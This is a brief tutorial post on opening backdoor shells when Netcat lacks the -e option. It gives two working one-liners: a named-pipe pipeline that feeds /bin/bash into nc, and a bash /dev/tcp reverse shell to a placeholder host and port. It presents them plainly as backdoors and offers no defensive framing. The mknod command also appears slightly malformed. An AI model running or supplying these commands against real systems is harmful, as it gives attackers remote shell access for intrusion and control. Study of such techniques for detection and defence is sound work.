Netcat backdoor without -e (execute option)
Netcat is installed by default on a lot of Linux systems, however we are seeing more and more Netcat’s are compiled without the -e option. The -e options allows us to execute and serve an executable over the connecting socket. It is incredibly handy feature, both for controlling an executable over a network connection, or for creating simple backdoors. Thus as a security measure, Netcat is sometimes compiled without the -e option. In fact, if you want to compile Netcat with the -e option, you need to compile it with the option GAPING_SECURITY_HOLE.
While the -e option can be a concern from a security point of view, it is often trivially bypassed.
Below are examples that servers shells without the execute option. In the examples, a special Linux pipe type of file is used. This is a FIFO type of file structure, what goes first in, goes first out. Quite handy for pushing data in orderly fashion.
mknod p pipe /bin/bash 0<pipe | nc TargetIP Port
I don’t care what you just showed me, I dont have Netcat!
Bash can do arbitrary TCP and UDP connections to wherever you want, so a Netcat similar reverse shell would be:
/bin/bash -i >& /dev/tcp/TargetIP/Port 0>&1
On your target system you should be receiving a sweet bash shell.